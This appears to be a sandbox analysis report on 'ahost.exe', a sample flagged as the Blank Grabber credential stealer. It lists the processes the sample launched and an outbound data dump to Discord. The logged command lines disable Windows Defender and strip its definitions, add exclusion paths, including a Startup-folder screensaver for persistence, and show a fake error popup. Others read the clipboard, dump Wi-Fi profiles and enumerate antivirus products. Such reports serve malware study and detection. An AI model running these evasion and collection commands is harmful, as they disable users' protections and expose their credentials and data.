2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 49 de 7e 8c 34 e7 d3 7e c9 dc a7 e4 ff 48 e6 3c dc b3 2b 77 f7 72 ed 38 23 3f 9a 2c 8e bf 8e 06 c0 df d4 ad d1 3c 0e 46 ec c7 2f cd c8 be 27 6e 29 da 5a b7 9d a0 2f 53 cb b3 45 67 bc be 4c 0c 29 cd d8 8e 49 6f 6c 63 e6 ab b2 c6 2e 11 43 bd 87 18 62 73 ef 71 2d 18 3f e3 38 70 04 ff a1 db 8e ec 32 36 d1 58 25 ba 3b a6 92 e3 d9 bb 29 77 1c 17 82 d1 6c 0b 31 5c 74 09 6a ba 2d 63 ba b5 da a0 8e a2 41 b3 d4 22 25 96 0f bf fe 92 b8 26 60 41 42 11 e5 b0 ef bb 3d 5b f1 a6 b5 9c da c6 02 3f b5 88 21 a6 b6 76 be 7c e6 8d bc b7 69 55 38 da 7d 5c 0b dd 92 02 5e c1 2b 2b b9 3f eb d6 7f 28 b1 f8 c2 26 3a 01 cc 00 60 2d 32 7e e3 c4 2a 17 26 e0 dd 6e 6a 86 c5 7b bb 25 f1 7d 7d d9 77 19 55 3a f2 98 05 6c 63 d8 17 6f 67 41 cc ab 19 af c7 e8 d9 cb b8 ca e8 82 e7 f2 1c 03 5a Data Ascii: I~4~H<+wr8#?,<F/'n)Z/SEgL)Iolc.Cbsq-?8p26X%;)wl1\tj-cA"%&`AB=[?!v\|iU8}\^++?(&:`-2~*&nj{%}}wU:lcogAZ
2024-12-13 07:37:57 UTC	1255	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 07:37:57 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734075478 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwkuEwvKx%2Fy1ZpufbQaAbIFwSVvPWB2fx%2FQ9pTsSali82LoCYBMuZqcL5aSWX3dZcf4tzU3koKglmm0u9v3dMQVCiodA3OWSmeLvvbehvpOqGgYfig7bgGugaUw%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=59db110601c0cdd6f5cf870796f640135c7dbd50-1734075477; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=JEq3usgsc09laeU6BfULN4MDc08M6NykX3r6GGHoWys-1734075477571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f144aafcf05c340-EWR

Target ID:	0
Start time:	02:37:09
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\ahost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ahost.exe"
Imagebase:	0x7ff7f91e0000
File size:	7'967'812 bytes
MD5 hash:	B5FC1D627D4DB7EE46DC0FE38AC28D01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:37:10
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\ahost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ahost.exe"
Imagebase:	0x7ff7f91e0000
File size:	7'967'812 bytes
MD5 hash:	B5FC1D627D4DB7EE46DC0FE38AC28D01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:37:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Imagebase:	0x7ff7ebbd0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff641f10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:37:13
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:37:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:37:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:37:17
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff72f7f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff72f7f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:37:18
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1044, Parent PID: 7228

General

Target ID:	30
Start time:	02:37:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:37:21
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:37:22
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:37:22
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:37:22
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 2508, Parent PID: 7328

General

Target ID:	37
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2984, Parent PID: 2240

General

Target ID:	38
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff641f10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff641f10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4580, Parent PID: 7364

General

Target ID:	46
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff641f10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	02:37:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
